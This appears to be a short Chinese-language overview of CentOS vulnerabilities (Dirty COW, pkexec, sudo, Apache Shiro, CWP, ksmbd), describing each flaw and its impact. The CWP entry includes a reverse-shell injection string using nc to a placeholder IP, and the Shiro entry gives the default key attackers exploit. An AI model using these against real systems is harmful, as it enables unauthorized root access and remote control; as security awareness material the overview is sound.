CentOS系統常見Exploit漏洞及細節
Dirty Cow是Linux內核處理寫時復制(Copy-on-Write)機制時的競爭條件漏洞,影響CentOS所有使用受影響內核版本的系統(如CentOS 6、7等早期版本)。攻擊者可通過該漏洞突破只讀內存限制,獲得root權限,進而完全控制服務器。常見利用方式包括下載編譯EXP代碼,通過預設密碼觸發權限提升。
Pkexec是Linux系統用于允許普通用戶以root權限執行命令的setuid工具。該漏洞源于其無法正確處理參數數量,會錯誤地將環境變量當作命令執行。CentOS 6、7、8等多個版本均受影響。攻擊者可通過編譯運行EXP代碼,誘導pkexec執行任意命令,實現系統提權。
該漏洞影響sudo 1.8.9至1.8.23版本(CentOS 7、8等系統常用版本),源于sudo對mail程序路徑的驗證缺陷。攻擊者可通過修改mail程序路徑,繞過sudo的身份驗證機制,在/etc/passwd文件中添加新用戶(如設置空密碼的root用戶),從而獲取系統最高權限。
Apache Shiro是Java應用常用的安全框架,若CentOS系統中的Java應用使用Shiro且未修改默認加密密鑰(如使用默認的“kPH+bIxk5D2deZiIxcaaaA==”),攻擊者可通過構造特殊請求,繞過身份驗證并獲取遠程shell訪問權限。該漏洞無需依賴其他組件,危害極大。
CWP是CentOS系統常用的免費主機控制面板(管理界面默認端口2083)。該漏洞源于文件管理功能的認證繞過(可從URL中移除用戶標識符)和命令注入(t_total參數未過濾)。攻擊者在知曉任意有效非root用戶名的情況下,可通過構造惡意POST請求(如在修改文件權限時注入nc 1.2.3.4 9999 -e /bin/bash
),實現未經認證的遠程代碼執行。影響版本包括0.9.8.1204、0.9.8.1188等,CWP已于2025年6月發布0.9.8.1205版本修復。
ksmd是Linux內核中的SMB服務器實現(替代傳統用戶空間Samba),用于提供文件共享服務。該漏洞源于smb2_sess_setup函數對Preauth_HashValue字段的處理缺陷,導致競態條件。攻擊者需先通過SMB服務身份驗證(需有效憑據),隨后利用會話設置過程中的內存破壞,實現內核級任意代碼執行。該漏洞CVSS評分為8.5,屬于高危漏洞,影響使用ksmbd服務的CentOS系統。
該漏洞影響1.9.17p1之前版本的sudo(CentOS 7、8等系統可能仍在使用),源于sudo對--chroot
(-R)選項的處理缺陷。本地攻擊者可利用該選項,即使不在sudoers文件中,也能以root身份執行任意命令。CISA已將該漏洞加入“已知被利用漏洞(KEV)”目錄,確認其在現實攻擊中被利用,風險極高。